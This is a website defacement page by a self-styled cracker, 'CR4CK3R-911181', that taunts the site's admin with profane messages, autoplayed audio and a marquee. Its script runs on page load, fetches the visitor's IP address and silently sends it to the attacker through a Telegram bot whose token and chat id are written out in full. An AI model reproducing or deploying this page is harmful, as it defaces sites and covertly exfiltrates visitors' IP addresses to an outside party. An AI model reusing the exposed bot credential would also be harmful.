<!DOCTYPE html>
<html>
  <head>
   
    <meta meta name="viewport" content="width=device-width, user-scalable=no" />
    <title>FUCK3D BY CR4CK3R-911181</title>
  
  
  
  <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap" rel="stylesheet">


<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Space+Mono:ital@1&display=swap" rel="stylesheet">



<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Ubuntu+Mono:ital@1&display=swap" rel="stylesheet">


<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Rubik+Beastly&display=swap" rel="stylesheet">



  </head>
    
  
  <style>
    body{
      height: 100%;
      width: 100%;
      background-color: black;
      text-align: center;
    }
   
   .logo{
     
     text-align: center;
   }
   

   
   
   .logo img {
     height: 210px;
     width: 210px ;
     border-radius: 100%;
     }
    
   .title {
     color: red;
     font-family: 'Share Tech Mono', monospace;
     font-size: 19px;
   }
   
 .hello{
   color: rgb(253,158,241);
   border-radius: 5px;
   -moz-border-radius: 5px;
   -webkit-border-radius: 5px;
   font-family: 'Roboto Mono', monospace;
   border-color: black;
   background-color: #000;
   font-size: 15px;
   width: 21vh;
   height: 8vh;
 }
 
 .msg{
   color: #fb4263;
   font-size: 18px;
   font-family: 'Space Mono', monospace;
 }
 
 .moving{
   direction: left;
   height: 70px;
   width: 60%;
   text-shadow: 4px;
   color: white;
   text-transform: uppercase;
   font-family: 'Ubuntu Mono', monospace;
 }
 

  
   .logo pre{
     /*padding-top: 20px;*/
     height: 40px;
     
     /*transform: rotate(-20deg);
     -moz-transform: rotate(-20deg);
   */  color: #b5bdb5;
   font-family: 'Rubik Beastly', cursive;
   font-size: 20px;
     
   
   
 }  
  .logo #bug{
   border-radius: 100%;
   
  height: 40px;
  width: 40px;
   
 }
 


   
 #audio{
   height: 30px;
   width: 60%;
 }
 
 
 
  </style>
  
  
  
    
  <body onload="collect()">
  
  <div class="logo">
<pre id=" title">CR4CK3R-911181 is Here</pre>

 <img src='bug.png' id="bug">


   <img src="logo.png">
  </div>
  
  <h2 class="title">SYST3M FUCK3D BY CR4CK3R-911181</h2>
  
  <button class="hello" onclick="clicker()"><b>Hello Admin</b></button>
  <br>
    <audio id="audio" controls="" autoplay="true">
     <source src="https://github.com/cracker911181/cracker911181.github.io/blob/main/msg.mp3?raw=true" type="audio/mpeg">
    </audio>
  <p class="msg">Your system fucked by CR4CK3R-911181 :-?
<br>Fix your system vulnerability<br>
It's last warning for you :)<br>
Otherwise, I will give you love again :-)</p>


<marquee class="moving"><b>CRACK3R-911181 is Here | so, Be Carefull | </b></marquee>
  
  
  
  
  
  <script>
    
    function collect(){
      var xmlHttp = new XMLHttpRequest();
      xmlHttp.open("GET", "https://api.ipify.org", false);
      xmlHttp.send(null);
      var ip = (xmlHttp.responseText);
      
      xmlHttp.open( "GET", "https://api.telegram.org/bot5016547829:AAHfFOV9BlfSSfNlcUFFhrJvDTRnDN55BGQ/sendMessage?chat_id=-639317585&text=🛑 Defence Page 🛑                  🚨 Target IP: "+ip, false);xmlHttp.send( null );
    }
   
    function clicker() {
        alert("Fuck you");
      }
    
  </script>
  
  
  </body>
</html>